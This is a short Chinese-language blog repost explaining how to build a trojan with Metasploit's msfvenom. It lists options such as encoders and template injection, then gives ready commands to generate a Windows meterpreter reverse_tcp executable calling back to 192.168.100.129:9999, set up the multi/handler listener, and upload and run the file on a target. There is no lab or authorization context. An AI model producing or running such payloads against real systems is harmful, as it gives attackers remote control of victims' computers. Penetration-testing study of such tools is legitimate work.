生活随笔
收集整理的這篇文章主要介紹了
Metasploit 之生成木马(msfvenom)
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
msfvenom參數
相關參數介紹
-p, --payload <payload> 指定需要使用的payload(攻擊荷載)
-l, --list [module_type] 列出指定模塊的所有可用資源,模塊類型包括: payloads, encoders, nops, all
-n, --nopsled <length> 為payload預先指定一個NOP滑動長度
-f, --format <format> 指定輸出格式 (使用 --list formats 來獲取msf支持的輸出格式列表)
-e, --encoder [encoder] 指定需要使用的encoder(編碼器)
-a, --arch <architecture> 指定payload的目標架構
--platform <platform> 指定payload的目標平臺
-s, --space <length> 設定有效攻擊荷載的最大長度
-b, --bad-chars <list> 設定規避字符集,比如: '\x00\xff'
-i, --iterations <count> 指定payload的編碼次數
-c, --add-code <path> 指定一個附加的win32 shellcode文件
-x, --template <path> 指定一個自定義的可執行文件作為模板
-k, --keep 保護模板程序的動作,注入的payload作為一個新的進程運行
--payload-options 列舉payload的標準選項
-o, --out <path> 保存payload
-v, --var-name <name> 指定一個自定義的變量,以確定輸出格式
--shellest 最小化生成payload
-h, --help 查看幫助選項
--help-formats 查看msf支持的輸出格式列表
windows
第一步 生成shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.129 LPORT=9999 -f exe > shell.exe
第二步 msf進行監聽
msf
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.100.129
set lport 9999
run
第三步 上傳到window,運行shell.exe
總結
以上是生活随笔為你收集整理的Metasploit 之生成木马(msfvenom)的全部內容,希望文章能夠幫你解決所遇到的問題。
如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。